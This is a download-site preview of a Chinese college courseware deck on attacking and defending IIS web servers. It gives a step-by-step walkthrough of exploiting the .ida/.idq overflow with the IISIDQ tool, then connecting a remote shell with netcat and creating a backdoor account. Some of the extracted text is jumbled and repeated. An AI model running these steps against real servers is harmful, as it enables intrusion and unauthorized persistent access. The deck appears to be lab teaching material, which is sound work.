学习情境三服务器入侵技术的应用与防护任务一Web服务器课件.ppt
- 【下载声明】
1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
3. 本页资料《学习情境三服务器入侵技术的应用与防护任务一Web服务器课件.ppt》由用户(晟晟文业)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 学习 情境 服务器 入侵 技术 应用 防护 任务 Web 课件
- 资源描述:
-
1、学习情境三服务器入侵技术的应用与防护学习情境三服务器入侵技术的应用与防护 任务一任务一 WebWeb服务器的入侵与防护服务器的入侵与防护 课程负责人:杨文虎课程负责人:杨文虎济南铁道职业技术学院济南铁道职业技术学院 信息工程系信息工程系网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护教学的实施过程教学的实施过程任务规划任务规划学生探究学生探究师生析疑师生析疑完成任务完成任务检查评测检查评测综合创新综合创新思考、探讨完成任务需要思考、探讨完成任务需要的相关资料,搜集资料,的相关资料,搜集资料,制定工作计划制定工作计划 明确需要完成的工作明确需要完成的工作任务;任务;教
2、师进行点评、确定教师进行点评、确定最终的实施方法;对最终的实施方法;对技术问题进行讲授和技术问题进行讲授和答疑。答疑。学生进入网络实训室,根学生进入网络实训室,根据工作计划完成每个工作据工作计划完成每个工作项目,完成每个项目实施项目,完成每个项目实施日志和心得总结日志和心得总结 学生分攻防角色相互检查学生分攻防角色相互检查任务完成情况,分析不足,任务完成情况,分析不足,给出评价;教师对学生的给出评价;教师对学生的日志和总结进行分析,给日志和总结进行分析,给出评价。出评价。探索更多的探索更多的Web服务器服务器的应用与防护的方法,的应用与防护的方法,搜索相关技术,并在实搜索相关技术,并在实训室中
3、进行验证。训室中进行验证。网络安全与防护网络安全与防护主要的IIS漏洞有那些?其攻防技巧各有何特点?掌握.ida&.idq漏洞技术的攻防技巧了解Printer漏洞,掌握Unicode漏洞的入侵方式防护策略;了解asp映射分块编码漏洞、Webdav漏洞的入侵方式防护策略。问题引领问题引领3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 Web服务器的入侵分为基于认证的入侵和基于漏洞攻击的入侵,基于认证的入侵包括以下常见的手段:IPC$入侵、远程管理计算机、Telnet入侵、远程命令的执行及进程查杀注册表的入侵、
4、暴力破解密码等。基于漏洞攻击近几年比较流行,黑客是信息时代的完美主义者,他们通过研究、试验、编写测试代码来发现远程服务器中的漏洞,通过利用远程服务器的漏洞,可以绕过系统的认证直接进入系统内部。常用的漏洞包括:IIS漏洞、操作系统漏洞、SQL服务器漏洞 IIS(Internet Information Server),即Internet信息服务器,它在Windows系统中提供Internet服务,例如提供Web服务、FTP服务、SMTP服务,IIS服务器在方便用户使用的同时,带来了许多安全隐患。IIS漏洞有近千余种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于溢出型漏洞,入侵者可以通过发
5、送特定指令格式的数据使远程服务区的缓冲区溢出,从而突破系统的保护,在溢出的空间中执行任意指令。主要的IIS漏洞有:.ida&.idq漏洞、Printer漏洞、Unicode漏洞、.asp映射分块编码漏洞、Webdav漏洞 IIS漏洞信息的搜集主要使用扫描软件扫描存在漏洞的主机,例如使用X-Scan进行IIS漏洞的扫描,使用telnet targetIP 80搜集Web服务器版本信息。3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 对于.ida&.idq漏洞,微软的Index Server可以加快Web的搜索
6、能力,提供对管理员脚本和Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq。管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的idq.dll存在一个缓冲溢出,问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数进行边界检查,可以导致远程攻击者利用溢出来获得System权限访问远程系统。关于.ida&.idq漏洞的检测主要使用X-Scan、Sfind等检测工具,手工检测:在地址栏中输入http:/targetIP/*.ida或者http:/targetIP/*.idq3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目
7、一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 IDQ入侵工具IISIDQ IISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后,有两种登录方式:一是攻击后主动连接方式命令iisidq.exe输入命令1;二是攻击后监听远程服务器连接命令iisidq.exe输入命令1如果不写输入命令,默认命令为cmd.exe/c+dir。如果使用,表示不使用默认命令而是要用户输入命令。IISIDQ支持的操作系统类型如下所示:0 IIS5 中文 Win2000 Sp0,1 IIS5 中文 Win2000 Sp1,2 IIS5 中文 Win2000 Sp2idq3.1Web服务器的入侵与
8、防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 漏洞溢出连接工具-NC nc在网络工具中有“瑞士军刀”的美誉,通过nc,入侵者可以方便的连接远程服务器.nc有两种方法进行连接:主动连接到外部:nc-options hostname ports ports,监听等待外部连接:nc l p port-option hostname port NC使用的参数说明:-e:prog程序重定向,一旦连接,就执行 -g:网关路由跳数,可设置到8 -h:帮助信息 -i:secs延时的间隔 -l:监听模式,用于入站连接 -n:指定数字的IP地址,不能
9、用hostname -o:file记录16进制的传输 -p:port本地端口号 -r:任意指定本地及远程端口 -s:addr本地源地址 -u:UDP模式 -v:详细输出(用两个-v可得到更详细的内容)-w:secs超时时间 -z:将输入输出关掉用于扫描时3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 下面我们来看几个入侵实例 .idq入侵实例1 步骤一:扫描远程服务器 步骤二:IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq 0 192.168.0.106 80 1 5213.1Web
10、服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤三:使用nc进行连接。使用命令nc v 192.168.0.106 521。3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤四:建立后门帐号步骤五:使用exit命令断开连接,比较命令如图所示3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 .idq入侵实例2 步骤一:扫描远程服务器 步骤二:使
11、用nc在本地打开端口等待连接。使用命令 nc-l p 250。参数-l表示使用监听模式,-p表示设置本地监听端口2503.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤三:IDQ溢出。使用命令iisidq 0 192.168.0.106 80 2 192.168.0.100 250 1采用方式二进行溢出,使远程服务器溢出后自动连接到本地计算机的250端口3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤四:进行溢出后
12、的攻击 步骤五:建立后门帐号 步骤六:使用exit命令断开连接3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 IISIDQ的图形界面3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 技术支持假冒的缺点之一是这个假冒是在太常见了。公司已经意识到这种假冒技巧并要求防范。另一种技巧是第三方假冒,它能够更成功的获取内部信息。.printer漏洞 windows2
展开阅读全文